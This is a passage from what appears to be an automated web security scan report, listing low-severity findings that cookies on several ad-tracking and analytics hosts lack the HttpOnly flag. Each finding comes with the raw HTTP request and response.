Content-Type: text/javascript; charset=utf-8
Set-Cookie: pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure
X-Pardot-LB: lb-d2
Connection: close

function piResponse() {
piSetCookie('visitor_id1852', '191471275', 3650);
if (document.location.protocol != "https:") {
var analytics_link = "http://" + "www2.znode.com/analytics?";
pi.tracker.visitor
...[SNIP]...

13.132. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/
Content-Length: 8286
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

13.133. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:32:28 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

13.134. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1150096029;fpan=1;fpa=P0-1990433296-1315339228713;ns=0;url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315339228711;tzo=300;a=p-9eJ8k4iSzux46;labels=CNBC.Section.search%2CCNBC.Sub%20Section.Search%7CAll HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF8BHwHSB4EQCa0QvYgQAshAHxA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: QS


13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://public.deloitte.com
Path:   /media/00Global/social_links/dtt_email_16x16.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/00Global/social_links/dtt_email_16x16.gif HTTP/1.1
Host: public.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:52:17 GMT
Set-Cookie: SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Tue, 06 Sep 2011 16:52:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Thu, 06 Aug 2009 16:11:30 GMT
ETag: "4090ff8eb016ca1:926"
Content-Length: 405

GIF89a........................(........x........K........\...........Z.....$..%..E....p.....    ..'.....P.................x..H............................................................................
...[SNIP]...

13.136. http://r.openx.net/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img?pixel_id=52bb1d64d5b1cddb69e55780dd37f64a HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.137. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:36:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:36:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

13.138. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069543.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:46:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Content-Length: 996
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585
...[SNIP]...

13.139. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

13.140. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

13.141. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

13.142. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
